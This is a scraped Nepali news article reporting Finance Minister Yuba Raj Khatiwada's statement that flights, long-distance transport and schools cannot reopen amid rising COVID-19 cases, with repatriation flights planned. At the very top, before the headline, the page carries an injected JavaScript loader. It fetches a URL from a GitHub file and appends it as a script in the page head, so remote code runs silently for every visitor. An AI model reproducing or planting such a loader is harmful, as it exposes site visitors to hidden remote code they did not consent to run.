;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); हवाईजहाज, गाडी र विद्यालय अहिलेकै अवस्थामा खोल्न सकिँदैन : मन्त्री खतिवडा – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • हवाईजहाज, गाडी र विद्यालय अहिलेकै अवस्थामा खोल्न सकिँदैन : मन्त्री खतिवडा
देश/प्रदेश

हवाईजहाज, गाडी र विद्यालय अहिलेकै अवस्थामा खोल्न सकिँदैन : मन्त्री खतिवडा

साउन २२,

काठमाडौं । देशका प्रमुख शहरहरुमा कोरोना संक्रमण तीव्र गतिमा फैलिँदै गएपछि सरकारले तत्कालै हवाई जहाज, विद्यालय र लामो दूरीका यातायात खोल्न नसकिने जनाएको छ। यही सोमबार बसेको मन्त्रिपरिषद् बैठकका निर्णय सार्वजनिक गर्दै अर्थ तथा सञ्चार मन्त्री डा. युवराज खतिवडाले यसबारे जानकारी दिएका हुन्। ‘सार्वजनिक यातायात, हवाई सेवा र विद्यालय सञ्चालन गर्न सरकार उदार भएर निर्णय गर्ने स्थितिमा छैन’, उनले भने, यसमा पनि विज्ञहरुको सुझाव लिएर निर्णय गर्छौं।’

खतिवडाले अहिलेकै स्थिति रहिरहे उदार बनेर सार्वजनिक यातायात खोल्न नसकिने बताए। ‘सार्वजनिक यातायात, विद्यालय सञ्चालन र हवाई उडान गरिहाल्ने अवस्था छैन’, उनले भने, ‘यस संकटको गम्भीर समीक्षा नभइ हामी यी तीन क्षेत्र खोल्ने निर्णय लिन सक्दैनौं।

मन्त्री खतिवडाले विदेशमा अलपत्र परेका नागरिकलाई उद्धार गर्ने गरी हवाई उडानको व्यवस्था गरिने पनि जानकारी दिएका छन्। उनको यो भनाइसँगै भदौ १ देखि आन्तरिक तथा बाह्य हवाई उडान, विद्यालय र लामो दूरीका सवारीसाधन चल्ने सम्भावना टर्दै गएको छ।file photo

फेसबुक प्रतिक्रियाहरु